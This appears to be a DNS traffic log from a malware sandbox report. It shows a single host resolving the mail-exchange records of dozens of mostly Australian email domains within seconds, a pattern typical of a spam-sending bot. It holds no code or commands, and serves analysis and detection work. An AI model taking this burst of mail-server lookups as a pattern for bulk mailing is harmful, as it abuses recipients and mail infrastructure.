                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.370841026 CET8.8.8.8192.168.2.30xd704No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.370841026 CET8.8.8.8192.168.2.30xd704No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.370841026 CET8.8.8.8192.168.2.30xd704No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.370841026 CET8.8.8.8192.168.2.30xd704No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.370841026 CET8.8.8.8192.168.2.30xd704No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.434303999 CET8.8.8.8192.168.2.30xfea6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.434303999 CET8.8.8.8192.168.2.30xfea6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.434303999 CET8.8.8.8192.168.2.30xfea6No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.458637953 CET8.8.8.8192.168.2.30xed6dNo error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.458637953 CET8.8.8.8192.168.2.30xed6dNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.458637953 CET8.8.8.8192.168.2.30xed6dNo error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.458637953 CET8.8.8.8192.168.2.30xed6dNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.458637953 CET8.8.8.8192.168.2.30xed6dNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.458637953 CET8.8.8.8192.168.2.30xed6dNo error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.458637953 CET8.8.8.8192.168.2.30xed6dNo error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.458637953 CET8.8.8.8192.168.2.30xed6dNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.477016926 CET8.8.8.8192.168.2.30x4109No error (0)cgs.act.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.508797884 CET8.8.8.8192.168.2.30x595aNo error (0)cgs-act-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.508797884 CET8.8.8.8192.168.2.30x595aNo error (0)cgs-act-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.602190971 CET8.8.8.8192.168.2.30xad5bNo error (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.613650084 CET8.8.8.8192.168.2.30xdea2No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.623584032 CET8.8.8.8192.168.2.30xffafNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.637394905 CET8.8.8.8192.168.2.30x9dbNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.704642057 CET8.8.8.8192.168.2.30x3ca7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.704642057 CET8.8.8.8192.168.2.30x3ca7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.704642057 CET8.8.8.8192.168.2.30x3ca7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.722958088 CET8.8.8.8192.168.2.30xc131No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.722958088 CET8.8.8.8192.168.2.30xc131No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.722958088 CET8.8.8.8192.168.2.30xc131No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.722958088 CET8.8.8.8192.168.2.30xc131No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.722958088 CET8.8.8.8192.168.2.30xc131No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.722958088 CET8.8.8.8192.168.2.30xc131No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.722958088 CET8.8.8.8192.168.2.30xc131No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.722958088 CET8.8.8.8192.168.2.30xc131No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.787925005 CET8.8.8.8192.168.2.30x6fe4No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.787925005 CET8.8.8.8192.168.2.30x6fe4No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.810298920 CET8.8.8.8192.168.2.30xd667No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.815850973 CET8.8.8.8192.168.2.30x2e6dNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.815850973 CET8.8.8.8192.168.2.30x2e6dNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.836188078 CET8.8.8.8192.168.2.30x6737No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.967643976 CET8.8.8.8192.168.2.30xbf95No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.987557888 CET8.8.8.8192.168.2.30x1079No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.987557888 CET8.8.8.8192.168.2.30x1079No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.201524019 CET8.8.8.8192.168.2.30x1384No error (0)multiculturalarts.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.201524019 CET8.8.8.8192.168.2.30x1384No error (0)multiculturalarts.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.201524019 CET8.8.8.8192.168.2.30x1384No error (0)multiculturalarts.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.242368937 CET8.8.8.8192.168.2.30x2aNo error (0)stonedesign.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.242368937 CET8.8.8.8192.168.2.30x2aNo error (0)stonedesign.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.252108097 CET8.8.8.8192.168.2.30x4021No error (0)adam.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.266556978 CET8.8.8.8192.168.2.30xaad3No error (0)d505367.a.ess.au.barracudanetworks.com3.24.133.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.266556978 CET8.8.8.8192.168.2.30xaad3No error (0)d505367.a.ess.au.barracudanetworks.com3.24.133.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.266556978 CET8.8.8.8192.168.2.30xaad3No error (0)d505367.a.ess.au.barracudanetworks.com3.24.133.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.272763014 CET8.8.8.8192.168.2.30x7783No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au13.70.186.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au20.92.133.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au13.236.218.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au52.63.166.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au20.190.127.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au20.70.88.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au3.104.195.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au54.79.63.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au20.92.134.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au52.147.60.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au52.147.56.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au3.105.81.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au54.66.10.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au20.92.133.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.339579105 CET8.8.8.8192.168.2.30xe1dbNo error (0)filter2.multic-2.mailguard.com.au13.238.252.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.405364990 CET8.8.8.8192.168.2.30x5e63No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.405364990 CET8.8.8.8192.168.2.30x5e63No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.405364990 CET8.8.8.8192.168.2.30x5e63No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.423610926 CET8.8.8.8192.168.2.30xbeacNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.423610926 CET8.8.8.8192.168.2.30xbeacNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.423610926 CET8.8.8.8192.168.2.30xbeacNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.423610926 CET8.8.8.8192.168.2.30xbeacNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.423610926 CET8.8.8.8192.168.2.30xbeacNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.423610926 CET8.8.8.8192.168.2.30xbeacNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.423610926 CET8.8.8.8192.168.2.30xbeacNo error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.423610926 CET8.8.8.8192.168.2.30xbeacNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.474143982 CET8.8.8.8192.168.2.30x4b5aNo error (0)cba.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.503312111 CET8.8.8.8192.168.2.30x1b00No error (0)cba-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.503312111 CET8.8.8.8192.168.2.30x1b00No error (0)cba-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.560591936 CET8.8.8.8192.168.2.30xe79fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.560591936 CET8.8.8.8192.168.2.30xe79fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.560591936 CET8.8.8.8192.168.2.30xe79fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.578711987 CET8.8.8.8192.168.2.30x4959No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.578711987 CET8.8.8.8192.168.2.30x4959No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.578711987 CET8.8.8.8192.168.2.30x4959No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.578711987 CET8.8.8.8192.168.2.30x4959No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.578711987 CET8.8.8.8192.168.2.30x4959No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.578711987 CET8.8.8.8192.168.2.30x4959No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.578711987 CET8.8.8.8192.168.2.30x4959No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.578711987 CET8.8.8.8192.168.2.30x4959No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.652163982 CET8.8.8.8192.168.2.30x4d99No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.683206081 CET8.8.8.8192.168.2.30x2c8aNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.710066080 CET8.8.8.8192.168.2.30x7fe9No error (0)student.ecu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.710066080 CET8.8.8.8192.168.2.30x7fe9No error (0)student.ecu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.737874031 CET8.8.8.8192.168.2.30x8487No error (0)web.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.737874031 CET8.8.8.8192.168.2.30x8487No error (0)web.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.743808031 CET8.8.8.8192.168.2.30x781eNo error (0)student-ecu-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.743808031 CET8.8.8.8192.168.2.30x781eNo error (0)student-ecu-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.763951063 CET8.8.8.8192.168.2.30xdbf5No error (0)mx-ha03.web.de212.227.15.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:59.976547003 CET8.8.8.8192.168.2.30x8692Name error (3)whiteminx.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.111073017 CET8.8.8.8192.168.2.30x950fNo error (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.117697954 CET8.8.8.8192.168.2.30xe042No error (0)ruzicka.id.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.117697954 CET8.8.8.8192.168.2.30xe042No error (0)ruzicka.id.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.117697954 CET8.8.8.8192.168.2.30xe042No error (0)ruzicka.id.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.117697954 CET8.8.8.8192.168.2.30xe042No error (0)ruzicka.id.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.131174088 CET8.8.8.8192.168.2.30x587cNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.144465923 CET8.8.8.8192.168.2.30x6d26No error (0)alt1.aspmx.l.google.com142.250.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.231203079 CET8.8.8.8192.168.2.30x1ae5No error (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.251372099 CET8.8.8.8192.168.2.30x95beNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.396178961 CET8.8.8.8192.168.2.30xb45No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.416718960 CET8.8.8.8192.168.2.30xe2dfNo error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.496377945 CET8.8.8.8192.168.2.30xd607Name error (3)cap.tas.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.501353025 CET8.8.8.8192.168.2.30x8db0No error (0)ompac.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.521301985 CET8.8.8.8192.168.2.30xd158No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.524950027 CET8.8.8.8192.168.2.30x2fbdNo error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.542274952 CET8.8.8.8192.168.2.30x5219No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.542274952 CET8.8.8.8192.168.2.30x5219No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.565313101 CET8.8.8.8192.168.2.30xac82No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.565313101 CET8.8.8.8192.168.2.30xac82No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.565313101 CET8.8.8.8192.168.2.30xac82No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.585803032 CET8.8.8.8192.168.2.30x7530No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.585803032 CET8.8.8.8192.168.2.30x7530No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.585803032 CET8.8.8.8192.168.2.30x7530No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.585803032 CET8.8.8.8192.168.2.30x7530No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.585803032 CET8.8.8.8192.168.2.30x7530No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.585803032 CET8.8.8.8192.168.2.30x7530No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.585803032 CET8.8.8.8192.168.2.30x7530No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.585803032 CET8.8.8.8192.168.2.30x7530No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.647819042 CET8.8.8.8192.168.2.30x7cb5No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.681265116 CET8.8.8.8192.168.2.30x2e1bNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.837552071 CET8.8.8.8192.168.2.30xa435No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.837552071 CET8.8.8.8192.168.2.30xa435No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.837552071 CET8.8.8.8192.168.2.30xa435No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.858069897 CET8.8.8.8192.168.2.30x4defNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.858069897 CET8.8.8.8192.168.2.30x4defNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.858069897 CET8.8.8.8192.168.2.30x4defNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.858069897 CET8.8.8.8192.168.2.30x4defNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.858069897 CET8.8.8.8192.168.2.30x4defNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.858069897 CET8.8.8.8192.168.2.30x4defNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.858069897 CET8.8.8.8192.168.2.30x4defNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.858069897 CET8.8.8.8192.168.2.30x4defNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.928464890 CET8.8.8.8192.168.2.30xe57dNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:00.948915005 CET8.8.8.8192.168.2.30x8309No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.000397921 CET8.8.8.8192.168.2.30x43ecNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.000397921 CET8.8.8.8192.168.2.30x43ecNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.000397921 CET8.8.8.8192.168.2.30x43ecNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.019547939 CET8.8.8.8192.168.2.30x8585No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.019547939 CET8.8.8.8192.168.2.30x8585No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.019547939 CET8.8.8.8192.168.2.30x8585No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.019547939 CET8.8.8.8192.168.2.30x8585No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.019547939 CET8.8.8.8192.168.2.30x8585No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.019547939 CET8.8.8.8192.168.2.30x8585No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.019547939 CET8.8.8.8192.168.2.30x8585No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:01.019547939 CET8.8.8.8192.168.2.30x8585No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
